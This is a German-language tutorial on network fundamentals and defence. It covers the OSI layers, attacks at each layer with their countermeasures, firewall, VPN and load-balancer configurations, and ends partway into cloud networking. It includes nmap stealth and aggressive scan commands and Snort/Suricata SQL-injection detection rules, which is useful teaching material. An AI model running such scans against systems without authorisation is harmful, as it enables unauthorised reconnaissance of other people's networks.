1. OSI-Modell und TCP/IP – Die Grundlagen

Das OSI-Modell (Open Systems Interconnection) hat 7 Schichten, die beschreiben, wie Daten durch ein Netzwerk fließen:

Schicht 1: Physical Layer (Physikalische Schicht)

Was passiert hier: Übertragung von Bits über physikalische Medien (Kabel, Funkwellen)

Komponenten:

• Ethernet-Kabel (Cat5e, Cat6, Cat7)
• Glasfaserkabel (Single-Mode, Multi-Mode)
• WLAN-Signale
• Hubs, Repeater

Praktisches Beispiel: Wenn du ein Ethernet-Kabel in deinen Computer steckst, werden elektrische Signale (1en und 0en) über die Kupferdrähte gesendet.

Angriffe auf dieser Schicht:

• Wiretapping/Abhören: Angreifer zapfen physische Kabel an und lesen den Datenverkehr mit
• Jamming: Bei WLAN werden Störsignale gesendet, um die Kommunikation zu blockieren
• Cable Cutting: Physische Zerstörung der Infrastruktur

Gegenmaßnahmen:

• Physische Sicherheit: Kabel in Rohren/Kabelkanälen verlegen
• Verschlüsselung auf höheren Schichten
• Redundante Verbindungen
• Abgeschirmte Kabel verwenden
• Kabelschränke abschließen

---

Schicht 2: Data Link Layer (Sicherungsschicht)

Was passiert hier: Organisation der Bits in Frames, MAC-Adressen, Fehlererkennung

Komponenten:

• Switches
• Bridges
• MAC-Adressen (z.B. 00:1A:2B:3C:4D:5E)
• VLANs

Praktisches Beispiel: Dein Computer hat eine eindeutige MAC-Adresse. Der Switch merkt sich, an welchem Port welche MAC-Adresse hängt, und leitet Frames gezielt weiter.

Protokolle:

• Ethernet
• ARP (Address Resolution Protocol)
• PPP (Point-to-Point Protocol)

Angriffe:

1. MAC-Flooding:
   • Angreifer überflutet den Switch mit gefälschten MAC-Adressen
   • Die MAC-Adress-Tabelle des Switches läuft über
   • Switch fällt in „Hub-Modus“ und sendet alle Frames an alle Ports
   • Angreifer kann nun allen Verkehr mitlesen
2. ARP-Spoofing/ARP-Poisoning:
   • Angreifer sendet gefälschte ARP-Antworten
   • Beispiel: „Ich bin der Router (192.168.1.1), meine MAC ist XX:XX:XX“
   • Opfer sendet nun alle Pakete an den Angreifer statt an den echten Router
   • Man-in-the-Middle-Position erreicht
3. MAC-Spoofing:
   • Angreifer ändert seine MAC-Adresse zu einer autorisierten
   • Umgeht MAC-basierte Zugangskontrolle
4. VLAN-Hopping:
   • Ausnutzung von DTP (Dynamic Trunking Protocol)
   • Angreifer sendet speziell präparierte Frames mit VLAN-Tags
   • Zugriff auf andere VLANs möglich

Gegenmaßnahmen:

• Port Security: Begrenze Anzahl der MAC-Adressen pro Port
• DHCP Snooping: Verhindert falsche DHCP-Server
• Dynamic ARP Inspection (DAI): Prüft ARP-Pakete gegen DHCP-Snooping-Datenbank
• Statische ARP-Einträge für kritische Geräte
• 802.1X Authentifizierung: Port-basierte Zugriffskontrolle
• Private VLANs: Isoliert Ports voneinander
• Trunk-Ports manuell konfigurieren, DTP deaktivieren

---

Schicht 3: Network Layer (Vermittlungsschicht)

Was passiert hier: Routing zwischen verschiedenen Netzwerken, IP-Adressen

Komponenten:

• Router
• Layer-3-Switches
• IP-Adressen (IPv4: 192.168.1.1, IPv6: 2001:db8::1)

Protokolle:

• IP (Internet Protocol): Transport von Paketen
• ICMP: Fehlermeldungen, Ping
• Routing-Protokolle: RIP, OSPF, BGP, EIGRP

Praktisches Beispiel: Du sendest eine E-Mail an jemanden in einem anderen Land. Router entlang des Weges schauen sich die Ziel-IP-Adresse an und leiten das Paket zum nächsten Router weiter, bis es das Ziel erreicht.

IP-Adressierung verstehen:

• IPv4: 32 Bit, z.B. 192.168.1.100
• Subnetzmaske: Definiert Netzwerk- und Host-Anteil
  • 255.255.255.0 (/24) = Netzwerk: erste 3 Oktette, Hosts: letztes Oktett
  • /24 = 254 nutzbare Hosts (256 – Netzwerk-ID – Broadcast)
  • /16 = 65.534 Hosts
  • /8 = 16.777.214 Hosts

Subnetting-Beispiel: Du hast 192.168.1.0/24 und willst 4 Subnetze:

• Benötige 2 Bits für Subnetze (2² = 4)
• Neue Maske: /26 (255.255.255.192)
• Jedes Subnetz hat 62 nutzbare Hosts (64 – 2)
• Subnetze: .0/26, .64/26, .128/26, .192/26

Angriffe:

1. IP-Spoofing:
   • Angreifer fälscht Absender-IP-Adresse
   • Schwer rückverfolgbar
   • Wird für DDoS-Angriffe genutzt
2. ICMP-Angriffe:
   • Ping Flood: Masse an Ping-Anfragen
   • Ping of Death: Überlange ICMP-Pakete (historisch)
   • Smurf Attack: Ping an Broadcast mit gefälschter Absender-IP
3. Routing-Angriffe:
   • Route Injection: Einschleusen falscher Routing-Informationen
   • BGP Hijacking: Umleiten von Internet-Traffic
   • Beispiel: Im Jahr 2008 leitete Pakistan YouTube-Traffic um
4. IP-Fragmentierung:
   • Ausnutzung von Fragmentierung zur Umgehung von Firewalls
   • Überlappende Fragmente verwirren Sicherheitssysteme

Gegenmaßnahmen:

• Ingress/Egress Filtering: Prüfe Absender-IPs an Netzwerkgrenzen
• Routing-Protokoll-Authentifizierung: MD5/SHA für OSPF, BGP
• Rate Limiting: Begrenze ICMP-Traffic
• Disable IP Source Routing: Verhindert, dass Absender Route vorgibt
• RPKI (Resource Public Key Infrastructure): BGP-Sicherheit
• Firewall-Regeln: Blockiere unnötige ICMP-Typen

---

Schicht 4: Transport Layer (Transportschicht)

Was passiert hier: Zuverlässige Ende-zu-Ende-Kommunikation, Ports

Protokolle:

• TCP (Transmission Control Protocol): Verbindungsorientiert, zuverlässig
• UDP (User Datagram Protocol): Verbindungslos, schnell

TCP verstehen:

• 3-Way-Handshake:
  1. Client → Server: SYN (Synchronize)
  2. Server → Client: SYN-ACK (Acknowledge)
  3. Client → Server: ACK
  • Verbindung aufgebaut!
• TCP-Flags:
  • SYN: Verbindungsaufbau
  • ACK: Bestätigung
  • FIN: Verbindungsabbau
  • RST: Verbindung zurücksetzen
  • PSH: Daten sofort pushen
  • URG: Dringliche Daten

Ports:

• Well-Known Ports (0-1023): HTTP=80, HTTPS=443, SSH=22, FTP=21, DNS=53
• Registered Ports (1024-49151): Von Software registriert
• Dynamic Ports (49152-65535): Temporär für Clientverbindungen

Praktisches Beispiel: Wenn du https://google.com aufrufst:

• Dein Browser nutzt TCP
• Verbindet zu Port 443 (HTTPS)
• 3-Way-Handshake etabliert Verbindung
• Daten werden zuverlässig übertragen
• Bei Paketverlust erfolgt erneute Übertragung

Angriffe:

1. SYN-Flood (DDoS):
   • Angreifer sendet massenhaft SYN-Pakete
   • Server wartet auf ACK (das nie kommt)
   • Server-Ressourcen erschöpfen sich
   • Halboffene Verbindungen füllen Connection Table
2. TCP-Reset-Attack:
   • Angreifer sendet RST-Paket mit korrekter Sequenznummer
   • Verbindung wird abgebrochen
   • Wird von manchen Zensur-Systemen eingesetzt
3. Session Hijacking:
   • Angreifer errät oder sniffen Sequenznummern
   • Übernimmt aktive TCP-Verbindung
   • Kann Commands in Session einschleusen
4. Port-Scanning:
   • SYN-Scan: Nur SYN senden, auf SYN-ACK warten (Stealth)
   • Connect-Scan: Volle Verbindung aufbauen
   • UDP-Scan: Langsamer, nutzt ICMP Port Unreachable
   • Ziel: Offene Ports und Dienste identifizieren

Gegenmaßnahmen:

• SYN-Cookies: Server speichert keine Verbindungsinformationen bis ACK
• Rate Limiting: Begrenze neue Verbindungen pro Sekunde
• Firewall mit Stateful Inspection: Prüft Verbindungsstatus
• Random Initial Sequence Numbers: Erschwert Session Hijacking
• TCP Wrapper: Zugriffskontrolle für Dienste
• Fail2Ban/Intrusion Prevention: Blockiert auffällige IPs
• Nur notwendige Ports öffnen
• Port Knocking: Versteckt Dienste hinter Sequenzen

---

Schicht 5-7: Session, Presentation, Application Layer

In der Praxis werden diese oft zusammengefasst:

Schicht 5 (Session): Verwaltung von Sitzungen Schicht 6 (Presentation): Datendarstellung, Verschlüsselung, Kompression Schicht 7 (Application): Anwendungsprotokolle

Wichtige Protokolle:

HTTP/HTTPS:

• HTTP: Unverschlüsselt, Port 80
• HTTPS: Verschlüsselt mit TLS/SSL, Port 443
• Methoden: GET, POST, PUT, DELETE

DNS (Domain Name System):

• Übersetzt Namen (google.com) in IP-Adressen
• Port 53 (UDP meist, TCP für große Antworten)
• Hierarchisches System: Root → TLD (.com) → Domain

SMTP/POP3/IMAP (E-Mail):

• SMTP: Versenden (Port 25, 587)
• POP3: Abholen (Port 110)
• IMAP: Synchronisiert (Port 143)

FTP (File Transfer):

• Port 21 (Kontrolle), Port 20 (Daten)
• Unverschlüsselt! Besser: SFTP oder FTPS

SSH (Secure Shell):

• Port 22
• Verschlüsselte Remote-Zugriff
• Kann auch für Tunneling genutzt werden

Angriffe:

1. Man-in-the-Middle (MITM):
   • Angreifer positioniert sich zwischen Client und Server
   • Kann Daten mitlesen und manipulieren
   • Besonders gefährlich bei unverschlüsselten Protokollen
   • SSL-Stripping: Downgrade von HTTPS zu HTTP
2. DNS-Angriffe:
   • DNS-Spoofing: Gefälschte DNS-Antworten
   • DNS-Cache-Poisoning: Manipulation des DNS-Caches
   • DNS-Amplification DDoS: Kleine Anfrage, große Antwort
   • Umleitung zu Phishing-Seiten
3. HTTP-Angriffe:
   • SQL-Injection: Einschleusen von SQL-Code über Webformulare
   • Cross-Site-Scripting (XSS): JavaScript-Code in Webseite einschleusen
   • HTTP-Flooding: DDoS durch viele HTTP-Requests
   • Slowloris: Hält viele Verbindungen offen, erschöpft Server
4. Credential Stuffing/Brute Force:
   • Ausprobieren von Passwörtern
   • Nutzung geleakter Passwort-Datenbanken
   • Ziele: SSH, FTP, Weblogins
5. Phishing:
   • Gefälschte E-Mails oder Webseiten
   • Social Engineering
   • Ziel: Zugangsdaten stehlen

Gegenmaßnahmen:

• HTTPS überall: TLS 1.3 verwenden
• HSTS (HTTP Strict Transport Security): Browser erzwingt HTTPS
• Certificate Pinning: Akzeptiert nur bestimmte Zertifikate
• DNSSEC: Signiert DNS-Antworten kryptografisch
• DNS over HTTPS/TLS: Verschlüsselte DNS-Anfragen
• Web Application Firewall (WAF): Schützt vor Web-Angriffen
• Input Validation: Prüfe alle Benutzereingaben
• Rate Limiting auf Anwendungsebene
• 2FA/MFA: Zwei-Faktor-Authentifizierung
• Starke Passwortrichtlinien
• E-Mail-Authentifizierung: SPF, DKIM, DMARC
• Security Awareness Training: Mitarbeiter schulen

---

2. Netzwerk-Komponenten im Detail

Router

Funktion: Verbindet verschiedene Netzwerke, routet Pakete

Was Router können:

• NAT (Network Address Translation): Übersetzt private IPs in öffentliche
  • Beispiel: Dein Heimnetzwerk (192.168.1.x) kommuniziert nach außen über eine öffentliche IP
• PAT (Port Address Translation): NAT mit Ports (NAT Overload)
• Packet Filtering: Einfache Firewall-Funktionen
• QoS (Quality of Service): Priorisiert bestimmten Traffic
• VPN-Terminierung: Verschlüsselte Verbindungen

Praktische Konfiguration (am Beispiel):

Router(config)# interface GigabitEthernet0/0
Router(config-if)# ip address 192.168.1.1 255.255.255.0
Router(config-if)# no shutdown

Router(config)# ip route 0.0.0.0 0.0.0.0 203.0.113.1
(Default-Route: Alles unbekannte zum ISP)

Sicherheit:

• Ändere Default-Passwörter
• Deaktiviere unnötige Dienste (Telnet → SSH)
• Aktualisiere Firmware regelmäßig
• Aktiviere Logging

---

Switch

Funktion: Verbindet Geräte im selben Netzwerk, lernt MAC-Adressen

Switch-Typen:

• Unmanaged: Plug-and-Play, keine Konfiguration
• Managed: Konfigurierbar (VLANs, Port-Security, etc.)
• Layer-3-Switch: Kann auch routen

VLAN (Virtual LAN): Logische Trennung von Netzwerken auf demselben physischen Switch

Praktisches Beispiel:

• VLAN 10: Mitarbeiter
• VLAN 20: Gäste
• VLAN 30: Server

Geräte in verschiedenen VLANs können nicht direkt kommunizieren, selbst wenn sie am selben Switch hängen.

Konfiguration:

Switch(config)# vlan 10
Switch(config-vlan)# name Mitarbeiter

Switch(config)# interface FastEthernet0/1
Switch(config-if)# switchport mode access
Switch(config-if)# switchport access vlan 10

Port-Security aktivieren:

Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security maximum 2
Switch(config-if)# switchport port-security violation shutdown
Switch(config-if)# switchport port-security mac-address sticky

---

Firewall

Funktion: Kontrolliert ein- und ausgehenden Datenverkehr

Firewall-Typen:

1. Packet-Filter-Firewall: Prüft IP, Port, Protokoll
2. Stateful-Firewall: Merkt sich Verbindungsstatus
3. Application-Layer-Firewall: Analysiert Anwendungsdaten
4. Next-Gen-Firewall: IPS, DPI, App-Control

Praktisches Beispiel (iptables unter Linux):

# Alle eingehenden Verbindungen blockieren (Standard)
iptables -P INPUT DROP

# Ausgehend und weitergeleitet erlauben
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT

# Etablierte Verbindungen erlauben
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Loopback erlauben
iptables -A INPUT -i lo -j ACCEPT

# SSH erlauben (Port 22)
iptables -A INPUT -p tcp --dport 22 -j ACCEPT

# HTTP und HTTPS erlauben
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT

# Ping erlauben (limitiert)
iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT

# Alles andere loggen und droppen
iptables -A INPUT -j LOG --log-prefix "DROPPED: "
iptables -A INPUT -j DROP

Firewall-Regeln Design:

• Default Deny: Alles blockieren, nur explizit Erlaubtes durchlassen
• Least Privilege: Minimale notwendige Rechte
• Dokumentiere alle Regeln
• Teste Regeln in Testumgebung

---

3. Netzwerk-Sicherheit: Praktische Verteidigungsstrategien

Defense in Depth (Mehrschichtige Sicherheit)

Keine einzelne Sicherheitsmaßnahme ist perfekt. Setze auf mehrere Schichten:

Beispiel-Architektur:

Internet
    ↓
Edge-Firewall (Perimeter)
    ↓
DMZ (Web-Server, Mail-Server)
    ↓
Interne Firewall
    ↓
Internes Netzwerk (VLANs segmentiert)
    ↓
Datenbank-Firewall
    ↓
Kritische Datenbanken

Network Segmentation

Warum: Begrenze die Ausbreitung von Angriffen

Praktische Umsetzung:

1. VLANs für verschiedene Abteilungen
2. Separate Netze für:
   • Produktion
   • Entwicklung/Test
   • Gäste-WLAN
   • IoT-Geräte (sehr wichtig!)
   • Management-Netzwerk (Out-of-Band)
3. Firewall-Regeln zwischen Segmenten

Beispiel: IoT-Geräte (Smart-TVs, Drucker) in separates VLAN, dürfen nicht ins Produktionsnetz.

---

IDS/IPS (Intrusion Detection/Prevention Systems)

IDS (Intrusion Detection System):

• Passiv: Überwacht Verkehr
• Alarmiert bei verdächtigen Mustern
• Beispiel: Snort, Suricata

IPS (Intrusion Prevention System):

• Aktiv: Blockiert Angriffe in Echtzeit
• Inline im Datenverkehr

Praktisches Beispiel mit Snort:

# Regel: Warnung bei SQL-Injection-Versuch
alert tcp any any -> $HTTP_SERVERS 80 (msg:"SQL Injection Attempt"; 
content:"union"; nocase; content:"select"; nocase; sid:1000001;)

---

VPN (Virtual Private Network)

Typen:

1. Site-to-Site VPN: Verbindet zwei Netzwerke (z.B. Firmenzentralen)
2. Remote-Access VPN: Einzelne Nutzer verbinden sich (Homeoffice)

Protokolle:

• IPsec: Stark, komplex, verwendet für Site-to-Site
• OpenVPN: Flexibel, verwendet TCP/UDP
• WireGuard: Modern, schnell, einfach
• SSL-VPN: Über Browser nutzbar

Praktische Konfiguration (OpenVPN Beispiel):

# Server-Konfiguration
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
push "redirect-gateway def1"
push "dhcp-option DNS 8.8.8.8"
cipher AES-256-CBC
auth SHA256

VPN-Sicherheit:

• Nutze starke Verschlüsselung (AES-256)
• Authentifizierung mit Zertifikaten + Passwort
• Perfect Forward Secrecy aktivieren
• Split-Tunneling vermeiden (Sicherheit > Performance)

---

4. WLAN-Sicherheit (802.11)

WLAN-Standards:

• 802.11b: 11 Mbit/s (2.4 GHz)
• 802.11g: 54 Mbit/s (2.4 GHz)
• 802.11n: 600 Mbit/s (2.4/5 GHz)
• 802.11ac: 1.3 Gbit/s (5 GHz)
• 802.11ax (Wi-Fi 6): 9.6 Gbit/s (2.4/5 GHz)

WLAN-Verschlüsselung:

• WEP: VERALTET! Knackbar in Minuten
• WPA: Besser, aber auch unsicher
• WPA2: Aktueller Standard (AES-Verschlüsselung)
• WPA3: Neuester Standard (seit 2018)

WLAN-Angriffe:

1. Deauthentication Attack:

• Angreifer sendet Deauth-Frames
• Clients werden vom WLAN getrennt
• Kann für Evil Twin genutzt werden

2. Evil Twin:

• Angreifer erstellt gefälschten Access Point
• Gleicher SSID-Name wie legitimes WLAN
• Clients verbinden sich unwissentlich
• Angreifer kann Traffic mitschneiden

3. WPS-Brute-Force:

• WPS (Wi-Fi Protected Setup) hat 8-stellige PIN
• Nur 11.000 Möglichkeiten wegen Schwachstelle
• In wenigen Stunden knackbar

4. Krack-Attack:

• Ausnutzung von WPA2-Schwachstelle
• Key Reinstallation Attack
• Entschlüsselung möglich

5. WLAN-Sniffing:

• Im Monitor-Mode können alle Pakete mitgelesen werden
• Unverschlüsselte Daten einsehbar

WLAN-Sicherheit Maßnahmen:

Grundeinstellungen:

✓ WPA3 nutzen (oder mindestens WPA2)
✓ Starkes Passwort (min. 20 Zeichen)
✓ SSID-Broadcast nicht verstecken (bringt wenig, erschwert legitime Nutzung)
✓ WPS deaktivieren
✓ Router-Admin-Passwort ändern
✓ Management-Interface nur aus LAN erreichbar
✓ Firmware aktuell halten
✓ MAC-Filterung (zusätzlich, nicht allein)

Enterprise WLAN:

• 802.1X mit RADIUS: Jeder Nutzer hat eigene Credentials
• EAP-TLS: Zertifikatsbasierte Authentifizierung
• Separates Gäste-WLAN: Isoliert vom Produktivnetz

Monitoring:

• WIDS (Wireless IDS): Erkennt Rogue Access Points
• Regelmäßige Scans nach unautorisierten APs

---

5. Praktische Netzwerk-Tools

Analyse-Tools:

Wireshark: Paketanalyse-Tool, zeigt allen Netzwerkverkehr

Praktische Anwendung:

# Filter für HTTP-Traffic
http

# Filter für spezifische IP
ip.addr == 192.168.1.100

# TCP-Verbindungen zu Port 443
tcp.port == 443

# Nur SYN-Pakete
tcp.flags.syn == 1 && tcp.flags.ack == 0

tcpdump (Linux): Kommandozeilen-Sniffer

# Alle Pakete auf Interface eth0
tcpdump -i eth0

# Nur HTTP-Traffic
tcpdump -i eth0 port 80

# In Datei speichern
tcpdump -i eth0 -w capture.pcap

# Spezifische IP
tcpdump -i eth0 host 192.168.1.100

nmap (Network Mapper): Port-Scanner und Netzwerk-Erkennungstool

# Einfacher Ping-Scan
nmap -sn 192.168.1.0/24

# Port-Scan (1000 häufigste Ports)
nmap 192.168.1.100

# Alle 65535 Ports scannen
nmap -p- 192.168.1.100

# Dienst-/Versions-Erkennung
nmap -sV 192.168.1.100

# OS-Erkennung
nmap -O 192.168.1.100

# Aggressive Scan (OS, Version, Scripts, Traceroute)
nmap -A 192.168.1.100

# Stealth-SYN-Scan
nmap -sS 192.168.1.100

netstat: Netzwerkverbindungen anzeigen

# Alle aktiven Verbindungen
netstat -a

# Listening Ports
netstat -l

# Mit Programmnamen
netstat -p

# Numerisch (keine DNS-Auflösung)
netstat -n

# Kombiniert
netstat -tulpn

---

Diagnostik-Tools:

ping: Erreichbarkeit testen

ping google.com
ping -c 4 192.168.1.1  # 4 Pakete

traceroute/tracert: Route zu Ziel anzeigen

traceroute google.com
# Windows: tracert google.com

nslookup/dig: DNS-Abfragen

nslookup google.com

dig google.com
dig google.com MX  # Mail-Server
dig google.com ANY  # Alle Records

iperf: Bandbreite testen

# Server
iperf -s

# Client
iperf -c 192.168.1.100

---

6. Praktische Szenarien und Lösungen

Szenario 1: Heimnetzwerk absichern

Situation: Typisches Heimnetzwerk mit Router, Computern, Smartphones, Smart-TV

Schritte:

1. Router härten:
   • Standard-Passwort ändern
   • WPA3 aktivieren, starkes WLAN-Passwort
   • Firmware aktualisieren
   • WPS deaktivieren
   • Remote-Management deaktivieren
2. Netzwerksegmentierung:
   • Gäste-WLAN einrichten (isoliert)
   • IoT-Geräte in separates Netz (wenn Router unterstützt)
3. DNS-Sicherheit:
   • DNS over HTTPS aktivieren oder
   • Pi-hole installieren (Werbung + Malware blockieren)
4. Geräte absichern:
   • Firewall auf allen Computern
   • Automatische Updates aktivieren
   • Antivirensoftware

Szenario 2: Kleines Firmennetzwerk

Situation: 50 Mitarbeiter, Server, WLAN, Internet

Architektur:

Internet
    ↓
Firewall/Router (pfSense/FortiGate)
    ├─> DMZ: Web-Server, Mail-Server
    ├─> LAN: Mitarbeiter (VLAN 10)
    ├─> WLAN: Mitarbeiter (WLAN: Mitarbeiter (VLAN 20, 802.1X)
    ├─> Server-VLAN (VLAN 30)
    └─> Gäste-WLAN (VLAN 99, isoliert)

Implementierungsschritte:

1. Firewall konfigurieren:

# Regeln zwischen VLANs
VLAN 10 (LAN) → VLAN 30 (Server): Erlaubt
VLAN 10 → Internet: Erlaubt
VLAN 20 (WLAN) → VLAN 30: Nur HTTP/HTTPS zu Web-Server
VLAN 99 (Gäste) → Nur Internet, alles andere blockiert
DMZ → LAN: BLOCKIERT

2. WLAN-Sicherheit:

• RADIUS-Server (FreeRADIUS) für 802.1X
• Jeder Mitarbeiter hat eigene Credentials
• Zertifikatsbasierte Authentifizierung für kritische User
• Gäste-WLAN mit Captive Portal + Zeitlimit

3. Monitoring implementieren:

# Syslog-Server aufsetzen
# Alle Netzwerkgeräte loggen hierhin

# SIEM-System (z.B. Wazuh, Graylog)
# Zentrale Log-Analyse

# Nagios/Zabbix für Netzwerk-Monitoring
# Alerts bei Ausfällen

4. Backup-Strategie:

• Tägliches Backup der Firewall-Konfiguration
• Redundante Internet-Anbindung (optional)
• Dokumentation aller Netzwerk-Konfigurationen

5. IDS/IPS einrichten:

# Suricata auf pfSense oder dedizierter Maschine
# Regeln von ET Open (Emerging Threats)

# Beispiel-Regel
alert http any any -> $HOME_NET any (msg:"Possible SQL Injection"; 
content:"select"; nocase; content:"from"; nocase; 
content:"where"; nocase; sid:1000002;)

6. Patch-Management:

• WSUS für Windows-Updates (zentral)
• apt-cacher-ng für Linux
• Regelmäßige Patch-Zyklen definieren

7. Zugriffskontrolle:

• VPN-Zugang für Remote-Mitarbeiter
• 2FA für alle kritischen Systeme
• Least Privilege Prinzip

---

Szenario 3: Man-in-the-Middle Angriff erkennen und verhindern

Angriffsszenario: Angreifer im selben Netzwerk führt ARP-Spoofing durch

Erkennung:

1. ARP-Tabelle prüfen:

# Linux/Mac
arp -a

# Suche nach doppelten MAC-Adressen für verschiedene IPs
# Legitimer Router: 192.168.1.1 → aa:bb:cc:dd:ee:ff
# Angreifer gibt sich als Router aus: 192.168.1.1 → 11:22:33:44:55:66

2. Mit arpwatch überwachen:

apt-get install arpwatch
systemctl start arpwatch

# Benachrichtigt bei ARP-Änderungen

3. Netzwerk-Traffic analysieren:

# Mit tcpdump nach ARP-Paketen suchen
tcpdump -i eth0 arp

# Ungewöhnlich viele ARP-Replies? → Verdächtig

Prävention:

1. Statische ARP-Einträge (für kritische Geräte):

# Linux
arp -s 192.168.1.1 aa:bb:cc:dd:ee:ff

# Dauerhaft in /etc/ethers
192.168.1.1 aa:bb:cc:dd:ee:ff

2. Dynamic ARP Inspection auf Switch:

Switch(config)# ip arp inspection vlan 10
Switch(config)# interface GigabitEthernet0/1
Switch(config-if)# ip arp inspection trust

3. HTTPS verwenden:

• Selbst bei MITM sind verschlüsselte Verbindungen geschützt
• Auf Zertifikatswarnungen achten!

4. VPN nutzen:

• Gesamter Traffic verschlüsselt
• MITM kann Inhalt nicht sehen

---

Szenario 4: DDoS-Angriff abwehren

Angriffsszenario: Webserver wird mit HTTP-Requests überflutet

Sofortmaßnahmen:

1. Traffic analysieren:

# Verbindungen zählen
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

# Top-IPs identifizieren

2. Rate Limiting auf Firewall:

# iptables: Max 20 neue Verbindungen pro Sekunde pro IP
iptables -A INPUT -p tcp --dport 80 -m state --state NEW \
  -m recent --set
iptables -A INPUT -p tcp --dport 80 -m state --state NEW \
  -m recent --update --seconds 1 --hitcount 20 -j DROP

3. Nginx Rate Limiting:

http {
    limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s;
    
    server {
        location / {
            limit_req zone=one burst=20 nodelay;
        }
    }
}

4. SYN-Cookies aktivieren:

sysctl -w net.ipv4.tcp_syncookies=1

Langfristige Lösungen:

1. CDN nutzen (Cloudflare, Akamai):

• Absorbiert DDoS-Traffic
• Caching reduziert Last
• WAF inklusive

2. Anycast-Routing:

• Traffic wird über mehrere Standorte verteilt

3. DDoS-Protection-Service:

• Spezialisierte Anbieter (Arbor Networks, etc.)

4. Kapazität erhöhen:

• Mehr Bandbreite
• Load Balancing
• Auto-Scaling in Cloud

---

7. Fortgeschrittene Themen

NAT und Port-Forwarding im Detail

NAT-Typen:

1. Static NAT (1:1):

Private IP 192.168.1.10 ↔ Public IP 203.0.113.10

Immer dieselbe Zuordnung

2. Dynamic NAT (Pool):

Private IPs 192.168.1.0/24 ↔ Public Pool 203.0.113.10-20

Dynamische Zuordnung aus Pool

3. PAT/NAT Overload (meistgenutzt):

192.168.1.10:54321 → 203.0.113.1:54321
192.168.1.11:54322 → 203.0.113.1:54322
192.168.1.12:54323 → 203.0.113.1:54323

Viele private IPs teilen sich eine öffentliche IP

Port-Forwarding Beispiel:

# Server im LAN (192.168.1.100) von außen über Port 8080 erreichbar

# iptables
iptables -t nat -A PREROUTING -p tcp --dport 8080 \
  -j DNAT --to-destination 192.168.1.100:80
iptables -A FORWARD -p tcp -d 192.168.1.100 --dport 80 -j ACCEPT

NAT-Probleme:

• Peer-to-Peer Verbindungen schwierig
• Ende-zu-Ende-Prinzip verletzt
• Probleme mit einigen Protokollen (FTP, SIP)

Lösungen:

• UPnP/NAT-PMP: Automatisches Port-Forwarding
• STUN/TURN: Für WebRTC
• IPv6: Kein NAT mehr nötig (jedes Gerät eigene IP)

---

Load Balancing

Zweck: Verteilt Last auf mehrere Server

Methoden:

1. Round Robin:

Request 1 → Server A
Request 2 → Server B
Request 3 → Server C
Request 4 → Server A (wieder von vorne)

2. Least Connections:

• Neuer Request geht zum Server mit wenigsten aktiven Verbindungen

3. IP-Hash:

• Client-IP bestimmt Server (Session-Persistenz)

4. Weighted:

• Server mit mehr Kapazität erhalten mehr Requests

Praktische Implementierung mit HAProxy:

frontend http_front
   bind *:80
   default_backend http_back

backend http_back
   balance roundrobin
   server server1 192.168.1.10:80 check
   server server2 192.168.1.11:80 check
   server server3 192.168.1.12:80 check

Health Checks:

# HAProxy prüft Server-Verfügbarkeit
option httpchk GET /health
http-check expect status 200

Layer 4 vs Layer 7 Load Balancing:

• L4: Arbeitet mit IP/Port (schnell, blind für Inhalt)
• L7: Analysiert HTTP-Requests (intelligent, langsamer)

---

Quality of Service (QoS)

Zweck: Priorisiert wichtigen Traffic

Klassifizierung:

Kritisch (VoIP, Video-Conferencing): Höchste Priorität
Wichtig (Business-Apps): Mittlere Priorität
Normal (Web-Browsing): Standard
Niedrig (Downloads, Updates): Niedrigste Priorität

DSCP (DifferentialServices Code Point):

• Markiert Pakete im IP-Header
• Router behandeln Pakete entsprechend

Traffic Shaping vs Policing:

• Shaping: Puffert Pakete, glättet Traffic
• Policing: Droppt überschüssige Pakete

Praktisches Beispiel (Linux tc):

# Interface eth0, max 100 Mbit
tc qdisc add dev eth0 root handle 1: htb default 30

# Klasse für VoIP (50 Mbit garantiert)
tc class add dev eth0 parent 1: classid 1:10 htb rate 50mbit ceil 100mbit

# Klasse für Web (30 Mbit)
tc class add dev eth0 parent 1: classid 1:20 htb rate 30mbit ceil 80mbit

# Rest
tc class add dev eth0 parent 1: classid 1:30 htb rate 20mbit ceil 100mbit

# Filter: VoIP-Ports
tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 \
  match ip dport 5060 0xffff flowid 1:10

---

BGP (Border Gateway Protocol) – Das Internet-Routing-Protokoll

Was ist BGP:

• Routing zwischen autonomen Systemen (AS)
• Jeder ISP, große Firma hat eigene AS-Nummer
• Bestimmt, wie Daten durchs Internet fließen

Konzepte:

1. AS (Autonomous System):

AS64512 (deine Firma)
AS15169 (Google)
AS32934 (Facebook)

2. BGP-Peering:

• Direkter Austausch von Routen zwischen ASes
• Kann öffentlich (Internet Exchange) oder privat sein

3. Path Selection: BGP wählt Route basierend auf:

• AS-Path-Länge (kürzer = besser)
• Local Preference
• MED (Multi-Exit Discriminator)
• Weitere Attribute

BGP-Angriffe:

1. BGP Hijacking:

# Angreifer behauptet: "Ich habe Route zu 8.8.8.8"
# Aber kürzeren AS-Path als Google
# Traffic wird umgeleitet

Echte Beispiele:

• 2008: Pakistan vs YouTube
• 2018: Umleitung von AWS-Route53-Traffic

2. Route Leak:

• Unbeabsichtigte Weiterleitung von Routen
• Kann riesige Traffic-Probleme verursachen

Schutz:

1. RPKI (Resource Public Key Infrastructure):

# Kryptographische Signatur für BGP-Announcements
# Verifiziert: Wer darf welche IP-Präfixe ankündigen

2. IRR (Internet Routing Registry):

• Datenbank mit autorisierten Routen

3. BGP Communities:

• Tags für Routing-Policies

Praktisch (für die meisten nicht relevant): BGP-Konfiguration ist nur für Firmen relevant, die:

• Eigene AS-Nummer haben
• Multi-Homing (mehrere ISPs) nutzen
• Eigenen IP-Bereich haben

---

8. Cloud-Netzwerke (AWS, Azure, GCP)

Besonderheiten Cloud-Networking:

VPC (Virtual Private Cloud):

• Isoliertes virtuelles Netzwerk
• Vollständig konfigurierbar

Subnetting in der Cloud:

VPC: 10.0.0.0/16

Public Subnet: 10.0.1.0/24 (für Web-Server)
Private Subnet: 10.0.2.0/24 (für Datenbanken)

